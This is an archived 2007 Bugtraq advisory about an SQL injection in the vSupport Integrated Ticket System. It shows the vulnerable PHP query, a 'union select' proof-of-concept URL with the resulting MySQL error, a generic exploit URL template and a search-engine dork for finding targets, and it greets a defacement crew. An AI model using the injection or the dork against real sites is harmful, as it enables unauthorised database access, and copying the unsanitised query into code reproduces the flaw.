lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070609143340.26402.qmail@securityfocus.com>
Date: 9 Jun 2007 14:33:40 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: vSupport Integrated Ticket System 3.*.* SQL injection

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com 
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
		// do not limit the users access
		$fromuseraccess = "";
	}

	// get the info about the ticket first
	if ($ticket = $db->query_first("
		SELECT ticket.*
		" . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
		FROM " . TABLE_PREFIX . "ticket as ticket
		" . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
		WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
		$fromuseraccess
	"))
	{


+--------------------------------------------------------------------
+  An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+  output:
+--------------------------------------------------------------------

MySQL Error  : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064


Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     : 
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

		SELECT ticket.*
		,icon.title AS icontitle, icon.iconpath
		FROM ticket as ticket
		LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
		WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+  Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ